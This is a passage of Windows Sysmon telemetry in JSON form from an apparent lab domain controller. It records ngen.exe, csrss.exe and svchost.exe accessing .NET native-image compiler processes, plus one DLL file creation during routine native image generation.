C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.069","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010BA880E00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7675,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.069\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010BA880E00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.069","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010BA880E00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7676,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010BA880E00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010BA880E00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7677,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:03.194\r\nProcessGuid: {41C8662E-226B-5F25-0000-0010BA880E00}\r\nProcessId: 4560\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11d0-0\\System.ComponentModel.Composition.Registration.dll\r\nCreationUtcTime: 2020-08-01 08:06:03.194","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:03.194","ProcessGuid":"{41C8662E-226B-5F25-0000-0010BA880E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11d0-0\\System.ComponentModel.Composition.Registration.dll","CreationUtcTime":"2020-08-01 08:06:03.194","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7678,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.225\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-00104F8C0E00}\r\nTargetProcessId: 1248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.225","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-00104F8C0E00}","TargetProcessId":"1248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7679,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.225\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-00104F8C0E00}\r\nTargetProcessId: 1248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.225","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-00104F8C0E00}","TargetProcessId":"1248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7680,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-00104F8C0E00}\r\nTargetProcessId: 1248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-00104F8C0E00}","TargetProcessId":"1248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7681,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.288\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010D78F0E00}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.288","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010D78F0E00}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7682,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.288\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010D78F0E00}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:03.288","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-226B-5F25-0000-0010D78F0E00}","TargetProcessId":"3308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7683,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:03.288\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-226B-5F25-0000-0010D78F0E00}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 